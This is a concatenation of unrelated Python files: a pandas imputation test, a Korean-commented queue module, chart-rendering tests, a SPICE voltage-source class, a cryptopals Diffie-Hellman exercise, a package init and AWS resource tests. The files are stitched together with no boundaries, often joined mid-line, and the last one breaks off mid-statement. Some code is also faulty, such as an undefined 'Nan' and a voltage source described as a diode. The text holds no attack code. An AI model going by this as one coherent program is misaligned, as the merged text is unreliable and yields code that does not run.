movie_ratings = pd.read_csv(r'Data_csv\movie_ratings_full.csv') movie_ratings = trait.clean_dataframe(movie_ratings,3,4,5,6,7,8) movie_ratings = movie_ratings[:3] list_nan = [] for x in range(len(movie_ratings.columns)): if movie_ratings.columns[x] == 'genres1': list_nan.append('TEST') else: list_nan.append(Nan) columns = movie_ratings.columns.values.tolist() s2 = pd.Series(list_nan, index=columns) movie_ratings_nan = movie_ratings.append(s2,ignore_index=True) class Test_actors_labelisation(unittest.TestCase): def test_imputation_previous_value(self): # Given n = movie_ratings_nan #movie_ratings_nan['genres2'][3] = 'TEST' #movie_ratings_nan['genres3'][3] = 'TEST' expected_output1 = 'TEST' expected_output2 = 'TEST' # When output1 = imputation_previous_value(n)['genres2'][3] output2 = imputation_previous_value(n)['genres3'][3] # Then self.assertEqual(expected_output1, output1) self.assertEqual(expected_output2, output2) 1-10 # 순서에 관여하는 클래스 from . import utils from .log_gongik import Logger from .file_property import FileProp class QueueReadOnly(object): # 읽기 전용 큐 _setInstance4InitParent = set() _dctInstance4New = {} def __new__(cls, queueName:str, *args): if queueName in cls._dctInstance4New: return cls._dctInstance4New[queueName] cls.log = Logger() cls._instance = super().__new__(cls) cls._dctInstance4New[queueName] = cls._instance cls.log.INFO(cls._instance) return cls._instance def __init__(self, queueName:str, tplElements: tuple[str]): if queueName not in self._setInstance4InitParent: self._name = queueName self._lstQueue = [None] * len(tplElements) self._queueSize = len(tplElements) self._insertPoint = 0 self._refPoint = 0 self.log = Logger() self._setInstance4InitParent.add(queueName) def __str__(self) -> str: return self._name if hasattr(self, '_name') else super().__str__() #초기화시 큐에 데이터를 집어넣는다. def _push(self, value) -> bool: nextInsPoint = (self._insertPoint+1) % self._queueSize if self.isOverflow(): self.log.WARNING("Queue Full") return False self._lstQueue[self._insertPoint] = value # 테일포인터가 가르키는 자리에 value삽입 self._insertPoint = nextInsPoint # 다음 자리로 테일포인터 이동. 
return True #큐에서 데이터를 빼고(함수 앞에서 getHead로) 헤드포인트를 옮긴다. def view_next(self) -> object: nextRefPoint = (self._refPoint+1) % self._queueSize self._refPoint = nextRefPoint return self._lstQueue[self._refPoint] def view_previous(self) -> object: prevRefPoint = self._queueSize-1 if self._refPoint == 0 else self._refPoint-1 self._refPoint = prevRefPoint return self._lstQueue[self._refPoint] def refresh(self) -> object: try: for idx, ele in enumerate(self._lstQueue): self.log.DEBUG(f'{idx} : {ele.name}') return self._lstQueue[self._refPoint] except IndexError as ie: self.log.WARNING(ie, '/ calling invalid refPoint') self._refPoint = len(self._lstQueue) -1 return self._lstQueue[-1] # get oldest push @property def current_preview(self): try: return self._lstQueue[self._refPoint] except IndexError as ie: self.log.WARNING(ie, '/ calling invalid refPoint') self._refPoint = len(self._lstQueue) -1 return self._lstQueue[-1] @property def current_pos(self) -> int: return self._refPoint + 1 @property def size(self) -> int: return sum(bool(file) for file in self.queue) @property def name(self) -> str: return self._name @property def queue(self) -> list: return self._lstQueue def isEmpty(self) -> bool: return self._refPoint == self._insertPoint def isOverflow(self) -> bool: return False if self.isEmpty() else self._insertPoint == 0 def add(self, loc, name) -> bool: raise NotImplementedError() def detach(self, loc, name) -> bool: raise NotImplementedError() class MstQueue(QueueReadOnly): # 분류해서 집어넣음 def __new__(cls, *args): if not hasattr(cls, '_instance'): cls._instance = super().__new__(cls, 'master') cls.log.INFO('calling singleton queue:', cls._instance) return cls._instance def __init__(self): cls = type(self) if not hasattr(cls, '_init'): dctLoc2Names = utils.invert_dict(FileProp.name2AddrDBCorrected()) #도로명주소를 기준으로 정렬 후 초기화 tplSingleLocQueeue = tuple(( PropsQueue(correctedLocDB, tuple(nameLst)) for correctedLocDB, nameLst in dctLoc2Names.items() )) # 여기서 loc변수는 유일, 이미 보정된 위치 이름(DB-도로명주소 기준) super().__init__('master', tplSingleLocQueeue) self._lstQueue: list[PropsQueue] = [None] * len(tplSingleLocQueeue) self._queueSize = len(tplSingleLocQueeue) for element in tplSingleLocQueeue: self._push(element) self.log.INFO(f'MstQueue init, size = {self.size}, queue = {self.queue}') cls._init = True @classmethod def is_init(cls): return hasattr(cls, '_init') @property def total_size(self): ret = 0 try: for file in self.queue: file:PropsQueue ret += file.size except Exception as e: self.log.ERROR(e, '/ while getting total number') return -1 return ret def add(self, locationKey, fNameKey) -> bool: try: targetIdx = self._lstQueue.index(PropsQueue(locationKey)) # 마스터 큐에 위치한 장소큐의 위치를 찾는다 self._lstQueue[targetIdx].append_props(FileProp(fNameKey)) # 찾은 위치에 props 객체 삽입 except ValueError as ve: self.log.ERROR(ve) return 1 return 0 #나중에 모두 더해서 실행 결과 피드백을 준다 def remove_location(self, instance: QueueReadOnly) -> bool: if not self._lstQueue: return 1 try: self._lstQueue.remove(instance) #propsQueue객체를 제거 self.log.INFO(instance.name, 'removed from', self.name) except ValueError as ve: self.log.ERROR(ve) return 2 self._queueSize -= 1 return 0 def new(self, location: str, tplNames: tuple[str]): for name in tplNames: if FileProp(name).locationFmDB == location: for fName in tplNames: # 추가 전 위치 보정(보통은 초기화 때 보정되는데 나중에 추가되는 애들은 그렇지 않음) fProps = FileProp(fName) fProps.correct_address(dbAddr=location, apiAddr=FileProp(name).locationFmAPI) self.log.INFO(fName, 'Location Updated,', fProps.locationFmDB, 'to', location) break 
self._lstQueue.append(PropsQueue(location, tplNames)) #추가한다. self._queueSize += 1 class PropsQueue(QueueReadOnly): # 이미 생성된 FileProp인스턴스를 잡아다 넣어준다. _setInstance4Init = set() def __init__(self, queueName: str, tplFileNames4Props: tuple[str]=None): if queueName not in self._setInstance4Init: if not tplFileNames4Props: self.log.ERROR('attempting to initialize PropsQueue before files init ') return # 초기화가 안됐는데 실행되면 안된다 self._queueSize = len(tplFileNames4Props) self._lstQueue = [None] * self._queueSize self._sharedDetail = '' super().__init__(queueName, tplFileNames4Props) for element in tplFileNames4Props: prop = FileProp(element) self._push(prop) if not hasattr(self, '_tplLocApiDB'): self._tplLocApiDB = prop.location4Display # 맨 처음 나오는 거 대표로 지정 prop.locationFmAPI, prop.locationFmDB = self._tplLocApiDB # 같은 큐에 있으면 같은 주소로 보여짐 self.log.INFO(f'{queueName} Queue init, size = {self.size}, queue = {self.queue}') self._setInstance4Init.add(queueName) # 도로명주소 def set_common_details(self, inputDetail): '''유저의 입력에 따라 공통 세부사항을 업데이트한다.''' for prop in self.queue: prop: FileProp prop.details = inputDetail self._sharedDetail = inputDetail def set_common_location(self, inputLocation): '''지도 입력으로부터 얻은 공통 신주소로 주소를 업데이트한다''' for prop in self.queue: prop: FileProp prop.locationFmDB = inputLocation def append_props(self, instance: FileProp): if not isinstance(instance, FileProp): self.log.ERROR(f'weired value has inserted to terminal queue {instance}, expecting FileProp instance') return instance.details = self._sharedDetail instance.correct_address(apiAddr=self._tplLocApiDB[0],dbAddr=self._tplLocApiDB[1]) self._lstQueue.append(instance) self._queueSize += 1 def remove(self, instance: FileProp) -> int: if not self._lstQueue: return 1 try: self._setInstance4Init.discard(self.name) self._setInstance4InitParent.discard(self.name) self._lstQueue.remove(instance) # list element remove self.log.INFO(instance.name, 'removed from', self.name) self.log.DEBUG(f'{self._setInstance4InitParent = }, {self._setInstance4Init}') except ValueError as ve: self.log.ERROR(ve) return 2 self._queueSize -= 1 return 0 def remove_many(self, tplNames: tuple) -> int: if not self._lstQueue: return 1 ret = 0 try: for fName in tplNames: ret += self.remove(FileProp(fName)) except Exception as e: self.log.CRITICAL(e) return ret if __name__ == '__main__': mq0 = MstQueue((1, None, 3)) mq1 = MstQueue() mq2 = MstQueue((1, 2, 3)) mq3 = PropsQueue('not master1', (1, 2, 3)) mq4 = PropsQueue('not master', (1, 2, 3)) mq5 = PropsQueue('not master2', (1, None, 3)) mq6 = PropsQueue('not master2') print(mq6) print(mq0.size) print(mq1.size)import unittest, os, shutil from cybercaptain.visualization.bar import visualization_bar TESTDATA_FOLDER = os.path.join(os.path.dirname(__file__), '../assets') TESTDATA_CHARTS_FOLDER = os.path.join(TESTDATA_FOLDER, 'chart_inputs') TESTDATA_GEN_OUTPUT_FOLDER = os.path.join(TESTDATA_FOLDER, 'output') TESTDATA_SRC_FILENAME = os.path.join(TESTDATA_CHARTS_FOLDER, 'input_data_10_counted-*.ccsf') TESTDATA_SRC_FILENAME_SINGLE = os.path.join(TESTDATA_CHARTS_FOLDER, 'input_data_10_counted-1.ccsf') TESTDATA_TARGET_FILENAME_PNG = os.path.join(TESTDATA_GEN_OUTPUT_FOLDER, 'VisualizationBarRunOut.png') TESTDATA_TARGET_FILENAME_SVG = os.path.join(TESTDATA_GEN_OUTPUT_FOLDER, 'VisualizationBarRunOut.svg') # Append Needed Args - Related to Root Config projectName / projectRoot / moduleName def append_needed_args(existing_args): return {**existing_args, 'projectRoot': TESTDATA_FOLDER, 'projectName': "UNITTEST.cckv", 'moduleName': 
"UNITEST_MODULE"} class VisualizationBarRunTest(unittest.TestCase): """ Test the visualization bar for the run method """ def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def setUp(self): if not os.path.exists(TESTDATA_GEN_OUTPUT_FOLDER): os.makedirs(TESTDATA_GEN_OUTPUT_FOLDER) def tearDown(self): shutil.rmtree(TESTDATA_GEN_OUTPUT_FOLDER) def test_run(self): """ Test if the visu bar run method runs correct """ arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'groupedbarplot', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-groupedbarplot.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'groupedbarplot', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-groupedbarplot_threshold.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'groupedbarplot', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'title': 'Unittest title', 'xlabel': 'Unittest xlabel', 'ylabel': 'Unittest ylabel', 'threshold': 5, 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-groupedbarplot_threshold_lbl.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME_SINGLE, 'type': 'groupedbarplot', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-groupedbarplot_single.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'histogram', 'dataAttribute': 'grouped_value', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-histogram.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME_SINGLE, 'type': 'histogram', 'dataAttribute': 'grouped_value', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-histogram_single.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplot3d', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) 
self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplot3d.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplot3d', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplot3d_thresh.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplot3d', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'colormapAscending': True, 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplot3d_ascheat.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotgroupedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotgroupedstacked.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotgroupedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotgroupedstacked_thresh.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotcomparedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotcomparedstacked.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotcomparedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotcomparedstacked_thresh.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotcomparedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'figureSize': [10,10], 'filenamesRegexExtract': '([-+]\\d+)', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) 
self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotcomparedstacked_thresh_rg.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotcomparedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'figureSize': [10,10], 'horizontal': True, 'filenamesRegexExtract': '([-+]\\d+)', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotcomparedstacked_horiz.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotcomparedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'figureSize': [10,10], 'horizontal': True, 'scaledTo100': True, 'filenamesRegexExtract': '([-+]\\d+)', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotcomparedstacked_horiz_100.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotgroupedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'figureSize': [10,10], 'horizontal': True, 'scaledTo100': True, 'filenamesRegexExtract': '([-+]\\d+)', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotgroupedstacked_horiz_100.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG"""V (independant voltage source) device. Copyright 2014 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import math import subcircuit.interfaces as inter import subcircuit.sandbox as sb import subcircuit.stimuli as stim class V(inter.MNADevice, inter.CurrentSensor): """A SPICE Voltage source or current sensor.""" def __init__(self, nodes, value, res=0.0, induct=0.0, **kwargs): """Create a new SPICE Diode device instance. General form: VXXXXXXX N+ N- < DC/TRAN VALUE> >> + >> >> IYYYYYYY N+ N- < DC/TRAN VALUE> >> + >> >> Examples: VCC 10 0 DC 6 VIN 13 2 0.001 AC 1 SIN(0 1 1MEG) ISRC 23 21 AC 0.333 45.0 SFFM(0 1 10K 5 1K) VMEAS 12 9 VCARRIER 1 0 DISTOF1 0.1 -90.0 VMODULATOR 2 0 DISTOF2 0.01 IIN1 1 5 AC 1 DISTOF1 DISTOF2 0.001 N+ and N- are the positive and negative nodes, respectively. Note that voltage sources need not be grounded. Positive current is assumed to flow from the positive node, through the source, to the negative node. 
A current source of positive value forces current to flow out of the N+ node, through the source, and into the N- node. Voltage sources, in addition to being used for circuit excitation, are the 'ammeters' for SPICE, that is, zero valued voltage sources may be inserted into the circuit for the purpose of measuring current. They of course have no effect on circuit operation since they represent short-circuits. DC/TRAN is the dc and transient analysis value of the source. If the source value is zero both for dc and transient analyses, this value may be omitted. If the source value is time-invariant (e.g., a power supply), then the value may optionally be preceded by the letters DC. ACMAG is the ac magnitude and ACPHASE is the ac phase. The source is set to this value in the ac analysis. If ACMAG is omitted following the keyword AC, a value of unity is assumed. If ACPHASE is omitted, a value of zero is assumed. If the source is not an ac small-signal input, the keyword AC and the ac values are omitted. DISTOF1 and DISTOF2 are the keywords that specify that the independent source has distortion inputs at the frequencies F1 and F2 respectively (see the description of the .DISTO control line). The keywords may be followed by an optional magnitude and phase. The default values of the magnitude and phase are 1.0 and 0.0 respectively. Any independent source can be assigned a time-dependent value for transient analysis. If a source is assigned a time-dependent value, the time-zero value is used for dc analysis. There are five independent source functions: pulse, exponential, sinusoidal, piece-wise linear, and single-frequency FM. If parameters other than source values are omitted or set to zero, the default values shown are assumed. (TSTEP is the printing increment and TSTOP is the final time (see the .TRAN control line for explanation)). 
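
        Illustrative construction of this class (a sketch inferred from the
        code below, not part of the original SPICE documentation; the node
        names are placeholders):

            vdc = V(('1', '0'), 10.0)   # 10 V DC source between nodes 1 and 0
            vsin = V(('1', '0'),
                     stim.Sin(0.0, 1.0, 60.0, 0.0, 0.0, 0.0))  # 1 V, 60 Hz sine

        A series resistance or inductance may be modelled with the optional
        res and induct keyword arguments.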
""" inter.MNADevice.__init__(self, nodes, 1, **kwargs) # determine type of value provided: if isinstance(value, inter.Stimulus): self.stimulus = value self.stimulus.device = self elif isinstance(value, float) or isinstance(value, int): self.stimulus = None self.value = float(value) self.res = res self.induct = induct self.value = value def connect(self): nplus, nminus = self.nodes self.port2node = {0: self.get_node_index(nplus), 1: self.get_node_index(nminus), 2: self.create_internal("{0}_int".format(self.name))} def start(self, dt): self.jac[0, 2] = 1.0 self.jac[1, 2] = -1.0 self.jac[2, 0] = 1.0 self.jac[2, 1] = -1.0 self.jac[2, 2] = -(self.res + self.induct / dt) volt = 0.0 if self.stimulus: volt = self.stimulus.start(dt) elif self.value: volt = self.value self.bequiv[2] = volt def step(self, dt, t): if self.stimulus: volt = self.stimulus.step(dt, t) else: volt = self.value if self.induct: il = self.get_across_history(2) volt += self.induct / dt * il self.bequiv[2] = volt def get_current_node(self): return self.port2node[2], -1.0 class VBlock(sb.Block): """Schematic graphical inteface for V device.""" # meta data: friendly_name = "Voltage Source (DC)" family = "Sources" label = "V" engine = V symbol = sb.Symbol() # leads: symbol.lines.append(((60, 0), (60, 20))) symbol.lines.append(((60, 80), (60, 100))) # plus: symbol.lines.append(((60, 28), (60, 38))) symbol.lines.append(((55, 33), (65, 33))) # minus: symbol.lines.append(((55, 67), (65, 67))) # circle symbol.circles.append((60, 50, 30)) def __init__(self, name=""): # init super: sb.Block.__init__(self, name, V) # ports: self.ports['positive'] = sb.Port(self, 0, (60, 0)) self.ports['negative'] = sb.Port(self, 1, (60, 100)) # properties: self.properties['Voltage (V)'] = 1.0 def get_engine(self, nodes): return V(nodes, self.properties['Voltage (V)']) class VSinBlock(sb.Block): friendly_name = "Voltage Source (Sine)" family = "Sources" label = "VSIN" engine = V symbol = sb.Symbol() # leads: symbol.lines.append(((60, 0), (60, 20))) symbol.lines.append(((60, 80), (60, 100))) # plus: symbol.lines.append(((60, 28), (60, 38))) symbol.lines.append(((55, 33), (65, 33))) # circle symbol.circles.append((60, 50, 30)) # sine: a1 = math.pi a2 = 0.0 symbol.arcs.append((53, 58, 7, a1, a2, True)) symbol.arcs.append((67, 58, 7, -a1, -a2, False)) def __init__(self, name): # init super: sb.Block.__init__(self, name, V) # ports: self.ports['positive'] = sb.Port(self, 0, (60, 0)) self.ports['negative'] = sb.Port(self, 1, (60, 100)) # properties: self.properties['Voltage Offset (V)'] = 0.0 self.properties['Voltage Amplitude (V)'] = 1.0 self.properties['Frequency (Hz)'] = 60.0 self.properties['Delay (s)'] = 0.0 self.properties['Damping factor (1/s)'] = 0.0 self.properties['Phase (rad)'] = 0.0 def get_engine(self, nodes): vo = self.properties['Voltage Offset (V)'] va = self.properties['Voltage Amplitude (V)'] freq = self.properties['Frequency (Hz)'] td = self.properties['Delay (s)'] theta = self.properties['Damping factor (1/s)'] phi = self.properties['Phase (rad)'] sin = stim.Sin(vo, va, freq, td, theta, phi) return V(nodes, sin) class VPulseBlock(sb.Block): friendly_name = "Voltage Source (Pulse)" family = "Sources" label = "VPULSE" engine = V symbol = sb.Symbol() # leads: symbol.lines.append(((60, 0), (60, 20))) symbol.lines.append(((60, 80), (60, 100))) # plus: symbol.lines.append(((60, 28), (60, 38))) symbol.lines.append(((55, 33), (65, 33))) # circle symbol.circles.append((60, 50, 30)) # pulse: symbol.lines.append(((45, 60), (55, 60), (55, 50), (65, 50), 
(65, 60), (75, 60))) def __init__(self, name): # init super: sb.Block.__init__(self, name, V) # ports: self.ports['positive'] = sb.Port(self, 0, (60, 0)) self.ports['negative'] = sb.Port(self, 1, (60, 100)) # properties: self.properties['Voltage 1 (V)'] = 0.0 self.properties['Voltage 2 (V)'] = 1.0 self.properties['Delay (s)'] = 0.0 self.properties['Rise Time (s)'] = 0.0 self.properties['Fall Time (s)'] = 0.0 self.properties['Width (s)'] = 0.01 self.properties['Period (s)'] = 0.02 def get_engine(self, nodes): v1 = self.properties['Voltage 1 (V)'] v2 = self.properties['Voltage 2 (V)'] td = self.properties['Delay (s)'] tr = self.properties['Rise Time (s)'] tf = self.properties['Fall Time (s)'] pw = self.properties['Width (s)'] per = self.properties['Period (s)'] pulse = stim.Pulse(v1, v2, td, tr, tf, pw, per) return V(nodes, pulse) # solution to http://cryptopals.com/sets/5/challenges/33 # implementation of Diffie-Hellman import random import hashlib def GetPublicKey(p, g, a): return pow(g, a, p) def GetSharedKeyVal(p, B, a): return pow(B, a, p) def GetSharedKey(p, B, a): s = GetSharedKeyVal(p, B, a) return hashlib.sha1(str(s).encode('utf-8')).hexdigest() p = 0xffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361c55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552bb9ed529077096966d670c354e4abc9804f1746c08ca237327ffffffffffffffff g = 2 if __name__ == "__main__": a = random.randint(0, p - 1) A = GetPublicKey(p, g, a) b = random.randint(0, p - 1) B = GetPublicKey(p, g, b) key1 = GetSharedKey(p, B, a) print("Key 1: " + key1) key2 = GetSharedKey(p, A, b) print("Key 2: " + key2) if key1 == key2: print("Test succeeded!") else: print("Test failed.")bianjiang/tweeta """ tweeta ------- tweeta is a library for Python that helps to process data collected via Twitter APIs. Questions, comments? 
""" __version__ = '0.2.1' __author__ = ' <>' from .tweet import TweetaTweet from .exceptions import ( TweetaError )CloudWanderer-io/CloudWanderer import unittest from unittest.mock import ANY from cloudwanderer.boto3_services import Boto3Services from cloudwanderer.cloud_wanderer_resource import SecondaryAttribute from cloudwanderer.urn import URN from ..helpers import DEFAULT_SESSION, get_default_mocker from ..mocks import add_infra class TestCloudWandererBoto3Resource(unittest.TestCase): @classmethod def setUpClass(cls) -> None: get_default_mocker().start_general_mock(restrict_regions=["eu-west-2", "us-east-1", "ap-east-1"]) add_infra() cls.services = Boto3Services(boto3_session=DEFAULT_SESSION) cls.service = cls.services.get_service("ec2", region_name="eu-west-2") cls.iam_service = cls.services.get_service("iam", region_name="us-east-1") cls.s3_service = cls.services.get_service("s3", region_name="us-east-1") cls.resource = next(cls.service.get_resources("vpc")) cls.role_resource = next(cls.iam_service.get_resources("role")) cls.role_policy_resource = next(cls.role_resource.get_subresources()) cls.bucket_resources = list(cls.s3_service.get_resources("bucket")) @classmethod def tearDownClass(cls) -> None: get_default_mocker().stop_general_mock() def test_raw_data(self): assert self.resource.raw_data == { "CidrBlock": "172.31.0.0/16", "CidrBlockAssociationSet": [ { "AssociationId": ANY, "CidrBlock": "172.31.0.0/16", "CidrBlockState": {"State": "associated"}, } ], "DhcpOptionsId": ANY, "InstanceTenancy": "default", "Ipv6CidrBlockAssociationSet": [], "IsDefault": True, "State": "available", "Tags": [], "VpcId": ANY, } def test_normalised_raw_data(self): assert self.resource.normalised_raw_data == { "CidrBlock": "172.31.0.0/16", "CidrBlockAssociationSet": [ { "AssociationId": ANY, "CidrBlock": "172.31.0.0/16", "CidrBlockState": {"State": "associated"}, } ], "DhcpOptionsId": ANY, "InstanceTenancy": "default", "Ipv6CidrBlockAssociationSet": [], "IsDefault": True, "OwnerId": None, "State": "available", "Tags": [], "VpcId": ANY, } def test_resource_type(self): assert self.resource.resource_type == "vpc" def test_region_regional_resources(self): assert self.resource.region == "eu-west-2" def test_region_global_service_global_resources(self): resource_regions = [resource.region for resource in self.bucket_resources] assert sorted(resource_regions) == sorted(["us-east-1", "eu-west-2", "ap-east-1"]) def test_account_id(self): assert self.resource.account_id == "123456789012" def test_service(self): assert self.resource.service == "ec2" def test_id(self): assert self.resource.id.startswith("vpc-") def test_secondary_attribute_names(self): assert self.resource.secondary_attribute_names == ["vpc_enable_dns_support"] def test_subresource_types(self): assert self.role_resource.resource_map.subresource_types == ["role_policy"] def test_urn(self): assert isinstance(self.resource.urn, URN) assert str(self.resource.urn).startswith( "urn:aws:123456789012:eu-west-2:ec2:vpc" ), f"{str(self.resource.urn)} does not match 'urn:aws:123456789012:eu-west-2:ec2:vpc'" def test_get_secondary_attributes(self): result = 